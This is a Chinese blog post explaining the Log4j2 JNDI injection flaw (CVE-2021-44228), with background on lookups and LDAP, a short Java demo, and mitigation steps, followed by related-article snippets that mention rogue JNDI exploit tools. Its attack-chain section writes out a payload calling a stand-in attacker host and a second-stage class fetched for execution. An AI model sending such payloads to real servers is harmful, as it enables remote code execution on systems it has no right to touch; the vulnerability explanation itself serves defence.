Log4j2安全 JNDI漏洞 CVE-2021-44228

最新推荐文章于 2024-04-06 17:40:56 发布
最新推荐文章于 2024-04-06 17:40:56 发布
阅读量1.5k 收藏 1
点赞数 2
分类专栏: Java 文章标签: java 后端
本文为CSDN博主「=PNZ=BeijingL」的原创文章,遵循 CC-BY-NC-SA 版权协议,转载请附上原文出处链接及本声明。CC-BY-NC-SA协议为创作共用-署名-非商业性-相同方式共享
本文链接:https://blog.csdn.net/Beijing_L/article/details/121953667
版权

 

Apache Log4j2是基于Java的日志记录工具。工具重写了Log4j框架,并且引入了大量丰富特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。因该组件使用极为广泛,利用门槛很低,危害极大,腾讯安全专家建议所有用户尽快升级到安全版本。

12 月 10 日,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,漏洞原理官方表述是:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词  ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行,据悉,Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。已知受影响应用及组件:

  • Apache Solr
  • Apache Flink
  • Apache Druid
  • srping-boot-strater-log4j2

漏洞详细描述

Log4j是一个 Java 语言的库(library)所谓「库」,通俗地说就是服务于特定功能、可以重复利用的软件代码;如果在开发其他软件时需要用到这种功能,直接拿来套用就行了,避免重复劳动。Log4j 是最主流、常用的 Java 库之一,它的代码遍及各类主流软件和服务;这就是 Log4Shell 波及范围广泛的原因。

Log4j 是根据配置文件中设定的「模板」来记录日志的。为了增加灵活性,Log4j 的模板中可以留下一些特殊语法的「待定内容」;在实际生成日志时,Log4j 会根据这些语法的指示,通过检索、查询、计算,将这些待定内容替换为实际内容后记录到日志里。例如,如果在模板里写 ${date:yyyy-MM-dd},那么 Log4j 就会将其替换为形如 2021-12-12 的当前日期记录下来;如果在模板里写 ${java:version},Log4j 就会将其替换为形如 Java version 1.7.0_67 的实际 Java 版本记录下来

除了这些比较常规的待定内容,Log4j 还支持一种更为复杂的替换方式,称为 JNDI 查询。JNDI(Java Naming and Directory Interface)是 Java 的一项内置功能,它允许 Java 程序在一个目录——可以想象为一个花名册或电话本中查询数据。JNDI 查询的语法是 ${jndi:<查询位置>} 例如${jndi:ldap://ldap.example.com/a}

LDAP(轻型目录访问协议,Lightweight Directory Access Protocol)是网络世界里一种特别常见的实现「花名册」功能的协议。简而言之,LDAP 通过一种标准化的语法(称为识别名,Distinguished Names 或 DN)记录身份信息LDAP 支持通过 URL 地址的形式查询信息。例如,访问如下地址,它会向 LDAP 服务器 ldap.example.com 请求常用名为 John Appleseed 的用户信息

ldap://ldap.example.com/cn=John%20Appleseed

实现漏洞的链条就此串了起来。上述功能组合在一起,造成的结果是:Log4j 在记录日志时,可以通过 JNDI 接口,向一个外部的 LDAP 服务器发送请求。

漏洞描述

  • 攻击者向漏洞服务器发起攻击请求。

  • 服务器通过Log4j2记录攻击请求中包含的基于JNDILDAP的恶意负载${jndi:ldap://attacker.com/a}attacker.com是攻击者控制的地址。

  • 记录的恶意负载被触发,服务器通过JNDIattacker.com请求。

  • attacker.com就可以在响应中添加一些恶意的可执行脚本,注入到服务器进程中,例如可执行的字节码http://second-stage.attacker.com/Exploit.class

  • 攻击者执行恶意脚本。

例如

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Test {
    private static final Logger LOGGER = LogManager.getLogger(Test.class);

    public static void main(String[] args) {
        String code = "${jndi:rmi://localhost:9001}";
        LOGGER.info(code);
    }
}

 执行日志处理时会lookup处理,lookups是一个Map集合,初始化了一组Key, 当消息内容种包含指定字符的时候,使用StrLookup对象执行lookup操作

 

 处理的时候调用 jndiManager执行字符串后边部分,例如 rmi://localhost:xxxx

 

修复方案

据 Apache 官方最新信息显示,release 页面上已经更新了 Log4j 2.15.0 版本, 建议升级log4j版本

临时方案

(1)修改 jvm 参数 -Dlog4j2.formatMsgNoLookups=true
(2)修改配置 log4j2.formatMsgNoLookups=True
(3)将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

=PNZ=BeijingL
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2505
前言 最近Log4j2的JNDI注入漏洞CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4j,Log4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1228
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
rogue-jndi:用于JNDI注入攻击的恶意LDAP服务器
05-04
流氓JNDI 用于JNDI注入攻击的恶意LDAP服务器。 描述 该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了执行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如: InitialContext . doLookup( " ldap://your_server.com:1389/o=reference " ); 它将启动从易受攻击的客户端到本地LDAP服务器的连接。 然后,本地服务器使用包含有效载荷之一的恶意条目进行响应,这对于实现远程代码执行很有用。 动机 除了已知的JNDI攻击方法(通过引用中的远程类加载)之外,此工具还利用的功能带来了新的攻击媒介。 支持的有效载荷 经典的JNDI攻击,通过远程类加载导致RCE,可达到jdk8u191 通过org.apache.naming.factory.Bea
Apache Log4j2 Jndi RCE CVE-2021-44228漏洞原理讲解
最新发布
m0_62670778的博客
04-06 1250
Log4j2(Log for java)是Apache软件基金会下一个优秀的java程序日志监控组件Log4j2远程代码执行漏洞细节被公开【影响版本Log4j 2.x
漏洞复现】log4j2 CVE-2021-44228
zg_111的博客
03-20 2480
漏洞复现】log4j2 CVE-2021-44228漏洞复现
Log4j2远程代码执行漏洞CVE-2021-44228)
wangzhifei1的博客
01-16 1699
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
Log4j2漏洞复现(CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
CVE-2021-2109:通过JNDICVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1....步骤3:设定JNDI伺服器 java -cp marshals
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C ...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
log4j-2.15.0-rc2.zip
12-11
修复log4j关于JNDI注入漏洞注入的jar升级包,内附漏洞验证方式
Log4j2—CVE-2021-44228漏洞复现
oiadkt的博客
04-10 470
Log4j2—CVE-2021-44228漏洞复现
Log4j2发新版本2.16.0,加固漏洞防御,不想被攻击,就赶快更新啦!
腾讯全栈-ITCJF
12-15 2854
Log4j2发新版本2.16.0,加固漏洞防御,不想被攻击,就赶快更新啦!
炸了..Log4j2 再爆漏洞,v2.17.1 横空出世。。。
Java技术栈,分享最主流的Java技术
12-30 650
Log4j 2.17.0 再爆雷 Log4j 1.x, Log4j 2.x, Logback 的漏洞刚告一段落,栈长本以为这件事可以在 Log4j v2.17.0 这个版本终结了,没想到。。。 就在昨天,栈长打开公众号,在《团灭!Log4j 1.x 也爆雷了。。。速速弃用!!》一文中,有小伙伴给栈长留言: WC!又来漏洞??? 栈长也去 Log4j2 官方验证了下: Log4j 又发 v2.17.1 了,Log4j v2.17.0 又有远程代码执行漏洞,加上本次的漏洞,这是 Log4j 2.x 近期爆
JNDI注入漏洞
qq_61553520的博客
05-23 1144
基于Reference的远程/本地加载Factory类,攻击端需要启动LDAP/RMI目录服务,当攻击机请求之后,就会加载远程/本地的Factory来实现远程代码执行。反序列化的利用则是直接注入恶意的序列化数据,来达到远程代码执行的目的。
Apache Log4j2 lookup JNDI 注入漏洞CVE-2021-44228)
qq_41696518的博客
06-13 852
环境:使用Vulhub的漏洞环境工具:bp和JNDIExploit-1-1.2,需要Java环境!!
JNDI漏洞利用探索
m0_67105288的博客
02-19 1217
最近学习了师傅寻找的一些JNDI漏洞的利用链受益匪浅,自己也尝试关于JNDI漏洞利用做一些挖掘,目前JNDI在利用过程我想到了两个问题。 测试每一个JNDI Bypass 利用链都需要手动更改URL很不方便,能否我去请求一个地址,让目标将我所有的链跑一遍? JNDI利用过程中可以通过反序列化利用,能否自动化探测反序列化利用链? 自动测试Bypass 利用链 为了让这种方式更加通用,我们首先考虑的是JDK原生的实现ObjectFactory的类,那么我注意到了下面几个类。 com.sun.jndi.r
漏洞深度分析|Apache Karaf 4.2.16 存在JNDI 注入漏洞
LJQClqjc的博客
12-23 1067
棱镜七彩漏洞深度分析
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

=PNZ=BeijingL

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值